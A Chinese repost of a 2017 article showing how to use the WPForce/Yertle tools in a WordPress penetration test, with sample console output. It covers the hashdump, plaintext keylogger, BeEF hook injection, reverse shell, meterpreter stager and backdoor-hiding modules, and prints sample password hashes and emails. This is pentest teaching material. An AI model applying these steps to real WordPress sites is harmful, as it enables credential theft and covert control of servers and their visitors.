WPForce——一款 Wordpress 漏洞利用工具

本文讲的是WPForce——一款 Wordpress 漏洞利用工具

在渗透测试过程中,我们可能会遇到运行WordPress的Web服务器。虽然Web服务器上的大多数WordPress服务器都配置了强大的密码和安全插件,但内部网络很少出现这种情况。因此,攻击者经常可以在过时的WordPress版本中找到漏洞,或者就是简单地对管理密码进行猜测。一旦攻击者猜到管理密码,就可以对其他系统进行攻击。除了特权提升之外,还可以使用WordPress本身对客户端发起一些其他攻击。

为了方便测试,我们将使用自己开发的用于测试WordPress的工具——WPForce。WPForce和WPScan相比,具有以下2个优点:

1.与WPScan不同,WPScan会再次执行WordPress的登录页面;

2.WPForce会使用经过身份验证的API调用来测试登录凭据的有效性:

识别有效的登录凭据后,WPForce套件——Yertle中的配套脚本可用于将后门上传到WordPress服务器上并执行多个后期开发模块。运行Yertle比较简单,只需提供URL,用户名,密码和后门类型即可。虽然有两种类型的后门可供上传,但我们更喜欢-interactive选项:

一旦我们开始运行脚本,WPForce就将登录到WordPress站点并上传一个插件。也就是说,我们只需要提供-e参数并上传目录名称,就可以随时访问这个后门:

这个插件就会采取类似于SQLmap的os-shell的命令,要查看可用的模块,可以输入“help”或“?”:

os-shell> help
 
Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page

我们可以运行的一个有用的后期开发模块是hashdump,hashdump会登录SQL数据库,查询包含密码的哈希值,并返回输出。然后,我们可以破解这些散列,并开始尝试使用这些登录凭证攻击其他系统:

os-shell> hashdump
ID: 1  - Username: admin  Password: $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1  Email: Quaoar@localhost.com
ID: 2  - Username: wpuser  Password: $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S.  Email: wpuser@localhost.com
ID: 3  - Username: n00py  Password: $P$B0mYQT38IOJtOr/nl4dchdqgCrxsG/.  Email: n00py@protonmail.com
 
os-shell>

不仅可以收集散列,还可以收集明文凭证。通过在WordPress核心中修补PHP文件,我们可以在用户认证时以明文形式记录所有密码:

os-shell> keylogger
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
wp_signon function patched.  Do not run this more than once.  Use 'keylog' to check the log file.
os-shell>

经过警告后,用户将会对WordPress核心进行修改,验证功能将被修补:

等待用户登录后,我们可以通过键入“keylog”来查看日志文件来查看明文凭据:

os-shell> keylog
2017-03-30 - Username:  && Password:
2017-03-30 - Username: n00py && Password: thisisalsomynetworkpassword

除了查看登录凭据外,我们还可以利用BeEF控制目标主机的浏览器, Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网:

os-shell> beef
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
IP Address: 10.0.1.16
BeEF hook added!  Check BeEF for any hooked clients. Do not run this multiple times.

注入hook后,我们只需要等待用户浏览网站即可,一旦用户浏览网站,这些网站就立马被hook了。接下来,我们就可以发送任何我们想要的JavaScript有效载荷, BeEF包含可以针对客户端启动的大量攻击:

有效载荷在客户端的浏览器中执行:

与这些模块一样有用的还有另一种类型的shell,这时我们有两个选项可供选择:常规的反向TCP shell和一个被PHP篡改的shell。要升级到完全交互的shell,只需运行:

os-shell> shell
IP Address: 10.0.1.4
Port: 8080
Sending reverse shell to 10.0.1.4 port 8080
os-shell>

并在所选端口上进行监控:

root@Kali:~/WPForce$ nc -l 8080
bash: no job control in this shell
www-data@Quaoar:/var/www/wordpress/wp-content/plugins/aekpmsu$

如果我们想要一个更换shell,可以加载metasploit并运行:

os-shell> meterpreter
IP Address: 10.0.1.4
Port: 4444
Sending meterpreter stager to connect back to 10.0.1.4:4444
os-shell>

并在metasploit内接收更换:

[*] Started reverse handler on 10.0.1.4:4444
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 10.0.1.21
[*] Meterpreter session 1 opened (10.0.1.4:4444 -> 10.0.1.21:60763) at 2017-03-29 20:49:16 -0600

最后,使用WPForce时,有几种方法可以使这个检测工具更加隐蔽。默认情况下,该模块将其自身注册为WordPress中的插件,此插件对管理员来说是可见的:

要让后门从插件屏幕中“消失”,只需简单的运行命令“隐形”,隐形后,后门仍然可以访问:

os-shell> stealth

原文发布时间为:2017年4月19日

本文作者:xiaohui 

本文来自合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。

原文链接

时间: 2024-08-05 22:16:06

WPForce——一款 Wordpress 漏洞利用工具的相关文章

部分CIA的漏洞利用工具干货请查收

3月12日讯 CIA 辛辛苦苦几年攒的漏洞和工具"被"提交事件后,业内人士和记者都在仔细查看这些文件,各方都在关注事情进展. 相关阅读: 维基解密再曝美国情报机构惊天内幕 批露CIA网络武器库 部分CIA的漏洞利用工具干货请查收 - E安全 CIA本次泄露的基本为"监控"工具 CIA利用厂商漏洞从NSA.GCHQ(英国政府通信总部)或个人计算机安全研究员处获取了大量网络武器,但为了防止厂商发布补丁而未通知厂商. 本次维基解密揭露的黑客工具是CIA专门用来监控特定对象

垂钓者:世界上最先进的漏洞利用工具

Websense在最新进行的一项案例分析中,发现了一款叫做"垂钓者"(Angler)的漏洞利用工具包.它可以检测杀毒软件和虚拟机,并可以部署经过加密的点滴木马文件(dropper). 经过反复验证,这款工具可以最快的速度集成最新发布的零日恶意软件,工具所包含的恶意软件只在内存中运行,无需写入受害者硬盘.基于这些原因,以及其明显独特隐匿技术,垂钓者或将成为网络犯罪分子漏洞利用工具最先进的选择. 最近几周以来,新闻中时常出现有关垂钓者的报道,因其快速吸收了Adobe Flash系列零日漏洞

Sundown EK:漏洞利用工具中的抄袭大师

简介 Sundown是目前市场上最新款的漏洞利用工具,而Sundown的作者也成功地证明了自己其实就是一个抄袭大师.不知道这种"借鸡生蛋"的事情被曝光之后,还有用户会买他的单吗? 近期,由于Angler和Nuclear这两款漏洞利用工具的倒台,使得漏洞利用市场上出现了明显的断层.但是你也不用担心,既然"前浪死在了沙滩上",那么"后浪肯定会跟上".虽然这两大巨头倒下了,但是像Neutrino和RIG这样优秀的漏洞利用工具也开始逐渐崭露头角了.不仅如

Openstack Keystone身份验证模块出现安全绕过漏洞CVE-2017-2673 已经出现漏洞利用工具

开源平台Openstack的身份验证模块Keystone出现 安全绕过漏洞 ,黑客如果成功利用漏洞,可能绕过某些预期的安全限制,并执行未经授权的操作,并发动进一步的攻击. 影响范围 OpenStack Kesytone 10.0.0, 10.0.1 and 11.0.0 均受影响,其它版本也可能受影响.目前漏洞利用工具已经开始流传. Keystone是什么 Keystone(OpenStack Identity Service)是 OpenStack 框架中负责管理身份验证.服务规则和服务令牌功

Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

Struts2漏洞利用工具下载(已更新V1.8版)      2017-03-21:增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046.http://struts.apache.org/docs/s2-046.html.   2017-03-07: 增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行

从漏洞利用工具到零日漏洞:网络黑市大全

地下市场提供各种各样的服务供网络罪犯从中获利 地下市场 这些论坛提供的货品种类简直包罗万象,从物理世界的商品,比如毒品.武器,到数字世界的服务,比如垃圾邮件/网络钓鱼邮件投放.漏洞利用工具包服务."加壳器"."捆绑器".定制恶意软件开发.零日漏洞利用.防弹主机托管. 地下世界充斥各种外人听不懂的行话和俚语.加壳器,就是加密恶意软件以规避反病毒引擎检测的工具.捆绑器,是在合法程序中绑入恶意软件样本的工具.零日漏洞利用,是利用未打补丁漏洞的技术,攻击者用以获取对计算系统

NSA的Windows漏洞军火库泄漏:多个零日、利用工具可直接使用

本文讲的是NSA的Windows漏洞军火库泄漏:多个零日.利用工具可直接使用,Shadow Brokers(影子经纪人),过去八个月里出尽风头.将NSA(美国国家安全局)以千兆计的网络攻击武器泄漏到互联网的黑客个体/团伙,刚刚又公布了NSA极其重要的数据.在周五(北京时间临近下班)时候放出的这批数据,包括针对大多数版本Windows系统的强力漏洞利用和黑客工具.黑进全球SWIFT网络内多家银行的代码和证据等. 周五释出的数据,接近300MB大小.Shadow Brokers称数据偷自NSA,里边

ShadowBroker放大招-多种Windows零日利用工具公布

  北京时间2017年4月14日,Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个 Windows 远程漏洞利用工具,可以覆盖全球 70% 的 Windows 服务器,影响程度非常巨大.除Microsoft Windows以外,受影响的产品还有: IBM Lotus Notes,Mdaemon, EPICHERO Avaya Call Server,Imail. 事件时间轴 在2016 年 8 月有一个 "Shadow Brokers" 的黑客组织号称入侵了

Web服务器.svn隐藏文件夹漏洞利用、修复和杜绝

说明: SVN(subversion)是源代码版本管理软件, 在SVN的使用中, 会自动生成一个名为.svn的隐藏文件夹, 其中包含重要的源代码信息. 如果在发布代码时,直接复制代码文件夹到Web服务器, 同时.svn隐藏文件夹也被上传到程序根目录, 可以利用.svn/entries文件,获取到服务器源码.svn服务器账号密码等信息. 一.此隐藏文件夹是怎么来的? 从svn获取发布版本时,没有正确使用svn导出功能导致! 具体细节,乌云上面有篇文章,可以参考. 二.黑客是如何利用svn隐藏文件漏